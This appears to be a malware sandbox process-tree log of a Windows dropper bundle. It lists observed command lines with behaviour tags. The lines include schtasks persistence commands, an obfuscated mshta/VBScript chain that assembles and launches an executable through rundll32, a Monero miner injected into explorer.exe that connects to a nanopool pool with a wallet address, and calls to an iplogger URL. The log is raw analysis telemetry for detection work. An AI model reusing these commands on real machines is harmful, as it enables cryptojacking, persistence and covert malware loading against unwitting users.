C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa471813⤵
-
C:\Users\Admin\AppData\Local\Temp\a0-74d9d-b20-714ad-8cdaeff7c79af\Faevilyshutae.exe"C:\Users\Admin\AppData\Local\Temp\a0-74d9d-b20-714ad-8cdaeff7c79af\Faevilyshutae.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nlp5szmz.x30\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 14748 -s 24414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exeC:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe /qn CAMPAIGN="654"13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zsezgnbf.4yd\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633284578 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exeC:\Users\Admin\AppData\Local\Temp\slidtjp0.wr4\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\14chtr4o.zwo\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8168 -s 24414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bgzbfj5i.fsw\autosubplayer.exe /S & exit12⤵
- Blocklisted process makes network request
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\75lpt8hlC1NGZyE5J12J4MX_.exe"C:\Users\Admin\Documents\75lpt8hlC1NGZyE5J12J4MX_.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\FGP00Y3mTuq2surDBGCBZ2PR.exe"C:\Users\Admin\Documents\FGP00Y3mTuq2surDBGCBZ2PR.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6096 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\W5TmQT5ajJ9vWwg5m1wuKb6e.exe"C:\Users\Admin\Documents\W5TmQT5ajJ9vWwg5m1wuKb6e.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1015b9a4e0b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1015b9a4e0b.exeFri1015b9a4e0b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 3006⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri106e757f6d75.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeFri106e757f6d75.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exeC:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri106e757f6d75.exe6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1h8Se77⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc98aa46f8,0x7ffc98aa4708,0x7ffc98aa47188⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:38⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4012 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5060 /prefetch:88⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3756 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5136 /prefetch:28⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6196 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:18⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,16771270072340796570,2936855619303359491,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:18⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri1008c7d6874.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri1008c7d6874.exeFri1008c7d6874.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri103a7805577.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri103a7805577.exeFri103a7805577.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\4160956.scr"C:\Users\Admin\AppData\Roaming\4160956.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\6063150.scr"C:\Users\Admin\AppData\Roaming\6063150.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\1903531.scr"C:\Users\Admin\AppData\Roaming\1903531.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3353340.scr"C:\Users\Admin\AppData\Roaming\3353340.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Roaming\7794210.scr"C:\Users\Admin\AppData\Roaming\7794210.scr" /S8⤵
-
C:\Users\Admin\AppData\Local\Temp\inst001.exe"C:\Users\Admin\AppData\Local\Temp\inst001.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 2368⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t3.exe"7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 3648⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 5968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 6168⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 6448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 7208⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5700 -s 7808⤵
- Program crash
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7332 -s 6048⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF """" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe") do taskkill -f /Im "%~nXz"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "sfx_123_206.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u10⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: CLOSe ( CreatEOBjECt ("WScRIpt.sHell" ). rUn ( "CmD.Exe /Q /C COpy /Y ""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF ""/pni3MGzH3fZ3zm0HbFMiEo11u"" =="""" for %z iN (""C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE"") do taskkill -f /Im ""%~nXz"" " , 0 , tRue ))11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpy /Y "C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE" ..\4MCYlgNAW.eXE && StArT ..\4MCYlGNAW.EXE /pni3MGzH3fZ3zm0HbFMiEo11u& IF "/pni3MGzH3fZ3zm0HbFMiEo11u" =="" for %z iN ("C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE") do taskkill -f /Im "%~nXz"12⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscript: cLoSE ( cREAtEObJect ( "wSCRipT.SHELl" ). Run("Cmd /Q /C eCHo | SeT /p = ""MZ"" > 4~T6.Kj6& cOPy /b /y 4~T6.kJ6 +JJDPQL_.2B+ Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G " ,0, trUE ) )11⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C eCHo | SeT /p = "MZ" > 4~T6.Kj6&cOPy /b /y 4~T6.kJ6+JJDPQL_.2B+Z8ISJ6._Nm+oAykH.~~ +kdDPiLEn.~T5 + MZaNA.E ..\Kz_AMsXL.6g & Del /q *& STArT control ..\kZ_AmsXL.6G12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"13⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "13⤵
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G13⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G14⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G15⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\kZ_AmsXL.6G16⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4NM9R.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-4NM9R.tmp\setup_2.tmp" /SL5="$105B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1UOJ8.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-1UOJ8.tmp\setup_2.tmp" /SL5="$10634,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-2C8RL.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-2C8RL.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"C:\Users\Admin\AppData\Local\Temp\xiuyingzhang-game.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10d184202996a0d7f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10d184202996a0d7f.exeFri10d184202996a0d7f.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri105268dda3.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri105268dda3.exeFri105268dda3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 2446⤵
- Drops file in Windows directory
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri10acd1e0a9e6.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A21A2F0\Fri10acd1e0a9e6.exeFri10acd1e0a9e6.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
